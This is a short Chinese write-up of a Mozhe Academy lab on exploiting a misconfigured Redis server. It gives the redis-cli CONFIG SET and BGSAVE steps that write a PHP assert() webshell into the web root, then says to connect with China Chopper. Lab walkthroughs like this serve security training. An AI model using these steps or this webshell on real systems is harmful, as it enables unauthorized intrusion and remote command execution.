墨者学院 - Redis配置错误导致的远程代码漏洞溯源

分类: 文章 • 2025-04-17 15:34:46

给了2个端口，其中一个是redis 的（后面那个）

墨者学院 - Redis配置错误导致的远程代码漏洞溯源
虚拟机上安装 redis-cli (可以用宝塔直接安装 redis)

redis-cli -h 219.153.49.228 -p 49375

墨者学院 - Redis配置错误导致的远程代码漏洞溯源

设置路径和文件名

CONFIG SET dir /var/www/html CONFIG SET dbfilename shell.php

墨者学院 - Redis配置错误导致的远程代码漏洞溯源

写入文件

SET shell "<?php assert($_POST['cmd']);?>" BGSAVE

墨者学院 - Redis配置错误导致的远程代码漏洞溯源

访问另外一个端口下的 shell.php

能访问，证明写入成功

最后用菜刀连接就行